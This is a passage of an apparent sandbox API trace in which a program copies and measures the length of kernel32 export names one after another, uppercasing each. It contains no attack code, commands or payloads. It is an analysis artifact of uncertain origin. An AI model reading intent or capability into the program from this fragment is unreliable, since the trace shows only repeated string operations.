lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0178.420] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0178.420] lstrcpyA (in: lpString1=0x33eee64, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0178.420] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0178.420] lstrcpyA (in: lpString1=0x33eee64, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0178.420] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0178.420] lstrcpyA (in: lpString1=0x33eee64, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0178.420] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0178.420] lstrcpyA (in: lpString1=0x33eee64, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0178.420] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0178.420] lstrcpyA (in: lpString1=0x33eee64, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0178.420] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0178.420] lstrcpyA (in: lpString1=0x33eee64, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0178.420] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0178.420] lstrcpyA (in: lpString1=0x33eee64, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0178.420] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0178.420] lstrcpyA (in: lpString1=0x33eee64, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0178.420] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0178.420] lstrcpyA (in: lpString1=0x33eee64, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0178.420] lstrlenA (lpString="BEEP") returned 4 [0178.420] lstrcpyA (in: lpString1=0x33eee64, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0178.420] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0178.420] lstrcpyA (in: lpString1=0x33eee64, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0178.420] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0178.420] lstrcpyA (in: lpString1=0x33eee64, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0178.420] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0178.421] lstrcpyA (in: lpString1=0x33eee64, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0178.421] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0178.421] lstrcpyA (in: lpString1=0x33eee64, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0178.421] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0178.421] lstrcpyA (in: lpString1=0x33eee64, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0178.421] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0178.421] lstrcpyA (in: lpString1=0x33eee64, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0178.421] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0178.421] lstrcpyA (in: lpString1=0x33eee64, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0178.421] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0178.421] lstrcpyA (in: lpString1=0x33eee64, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0178.421] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0178.421] lstrcpyA (in: lpString1=0x33eee64, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0178.421] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0178.421] lstrcpyA (in: lpString1=0x33eee64, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0178.421] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0178.421] lstrcpyA (in: lpString1=0x33eee64, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0178.421] lstrlenA (lpString="CANCELIO") returned 8 [0178.421] lstrcpyA (in: lpString1=0x33eee64, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0178.421] lstrlenA (lpString="CANCELIOEX") returned 10 [0178.421] lstrcpyA (in: lpString1=0x33eee64, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0178.421] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0178.421] lstrcpyA (in: lpString1=0x33eee64, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0178.421] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0178.421] lstrcpyA (in: lpString1=0x33eee64, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0178.421] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0178.421] lstrcpyA (in: lpString1=0x33eee64, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0178.421] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0178.421] lstrcpyA (in: lpString1=0x33eee64, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0178.421] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0178.421] lstrcpyA (in: lpString1=0x33eee64, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0178.421] lstrlenA (lpString="CHECKELEVATION") returned 14 [0178.421] lstrcpyA (in: lpString1=0x33eee64, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0178.421] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0178.421] lstrcpyA (in: lpString1=0x33eee64, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0178.421] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0178.421] lstrcpyA (in: lpString1=0x33eee64, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0178.422] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0178.422] lstrcpyA (in: lpString1=0x33eee64, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0178.422] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0178.422] lstrcpyA (in: lpString1=0x33eee64, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0178.422] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0178.422] lstrcpyA (in: lpString1=0x33eee64, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0178.422] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0178.422] lstrcpyA (in: lpString1=0x33eee64, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0178.422] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0178.422] lstrcpyA (in: lpString1=0x33eee64, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0178.422] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0178.422] lstrcpyA (in: lpString1=0x33eee64, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0178.422] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0178.422] lstrcpyA (in: lpString1=0x33eee64, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0178.422] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0178.422] lstrcpyA (in: lpString1=0x33eee64, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0178.422] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0178.422] lstrcpyA (in: lpString1=0x33eee64, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0178.422] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0178.422] lstrcpyA (in: lpString1=0x33eee64, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0178.422] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0178.422] lstrcpyA (in: lpString1=0x33eee64, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0178.422] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0178.422] lstrcpyA (in: lpString1=0x33eee64, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0178.422] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0178.422] lstrcpyA (in: lpString1=0x33eee64, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0178.422] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0178.422] lstrcpyA (in: lpString1=0x33eee64, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0178.422] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0178.422] lstrcpyA (in: lpString1=0x33eee64, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0178.422] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0178.422] lstrcpyA (in: lpString1=0x33eee64, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0178.422] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0178.422] lstrcpyA (in: lpString1=0x33eee64, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0178.422] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0178.422] lstrcpyA (in: lpString1=0x33eee64, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0178.422] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0178.423] lstrcpyA (in: lpString1=0x33eee64, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0178.423] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0178.423] lstrcpyA (in: lpString1=0x33eee64, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0178.423] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0178.423] lstrcpyA (in: lpString1=0x33eee64, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0178.423] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0178.423] lstrcpyA (in: lpString1=0x33eee64, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0178.423] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0178.423] lstrcpyA (in: lpString1=0x33eee64, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0178.423] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0178.423] lstrcpyA (in: lpString1=0x33eee64, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0178.423] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0178.423] lstrcpyA (in: lpString1=0x33eee64, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0178.423] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0178.423] lstrcpyA (in: lpString1=0x33eee64, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0178.423] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0178.423] lstrcpyA (in: lpString1=0x33eee64, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0178.423] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0178.423] lstrcpyA (in: lpString1=0x33eee64, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0178.423] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0178.423] lstrcpyA (in: lpString1=0x33eee64, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0178.423] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0178.423] lstrcpyA (in: lpString1=0x33eee64, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0178.423] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0178.423] lstrcpyA (in: lpString1=0x33eee64, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0178.423] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0178.423] lstrcpyA (in: lpString1=0x33eee64, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0178.423] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0178.423] lstrcpyA (in: lpString1=0x33eee64, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0178.423] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0178.423] lstrcpyA (in: lpString1=0x33eee64, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0178.423] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0178.423] lstrcpyA (in: lpString1=0x33eee64, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0178.423] lstrlenA (lpString="COPYCONTEXT") returned 11 [0178.423] lstrcpyA (in: lpString1=0x33eee64, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0178.423] lstrlenA (lpString="COPYFILEA") returned 9 [0178.423] lstrcpyA (in: lpString1=0x33eee64, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0178.424] lstrlenA (lpString="COPYFILEEXA") returned 11 [0178.424] lstrcpyA (in: lpString1=0x33eee64, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0178.424] lstrlenA (lpString="COPYFILEEXW") returned 11 [0178.424] lstrcpyA (in: lpString1=0x33eee64, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0178.424] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0178.424] lstrcpyA (in: lpString1=0x33eee64, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0178.424] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0178.424] lstrcpyA (in: lpString1=0x33eee64, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0178.424] lstrlenA (lpString="COPYFILEW") returned 9 [0178.424] lstrcpyA (in: lpString1=0x33eee64, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0178.424] lstrlenA (lpString="COPYLZFILE") returned 10 [0178.424] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0178.424] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0178.424] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0178.424] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0178.424] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0178.424] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0178.424] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0178.424] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0178.424] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0178.424] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0178.424] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0178.424] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0178.424] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0178.424] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0178.424] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0178.424] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0178.424] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0178.424] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0178.424] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0178.424] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0178.424] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0178.424] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0178.424] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0178.424] lstrlenA (lpString="CREATEEVENTA") returned 12 [0178.425] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0178.425] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0178.425] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0178.425] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0178.425] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0178.425] lstrlenA (lpString="CREATEEVENTW") returned 12 [0178.425] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0178.425] lstrlenA (lpString="CREATEFIBER") returned 11 [0178.425] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0178.425] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0178.425] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0178.425] lstrlenA (lpString="CREATEFILEA") returned 11 [0178.425] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0178.425] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0178.425] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0178.425] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0178.425] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0178.425] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0178.425] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0178.425] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0178.425] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0178.425] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0178.425] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0178.425] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0178.425] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0178.425] lstrlenA (lpString="CREATEFILEW") returned 11 [0178.425] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0178.425] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0178.425] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0178.425] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0178.425] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0178.425] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0178.425] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0178.425] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0178.425] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0178.425] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0178.425] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0178.426] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0178.426] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0178.426] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0178.426] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0178.426] lstrlenA (lpString="CREATEJOBSET") returned 12 [0178.426] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0178.426] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0178.426] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0178.426] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0178.426] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0178.426] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0178.426] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0178.426] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0178.426] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0178.426] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0178.426] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0178.426] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0178.426] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0178.426] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0178.426] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0178.426] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0178.426] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0178.426] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0178.426] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0178.426] lstrlenA (lpString="CREATEPIPE") returned 10 [0178.426] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0178.426] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0178.426] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0178.426] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0178.426] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0178.426] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0178.426] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0178.426] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0178.426] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0178.426] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0178.426] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0178.426] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0178.427] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0178.427] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0178.427] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0178.427] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0178.427] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0178.427] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0178.427] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0178.427] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0178.427] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0178.427] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0178.427] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0178.427] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0178.427] lstrcpyA (in: lpString1=0x33eee64, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0178.427] lstrlenA 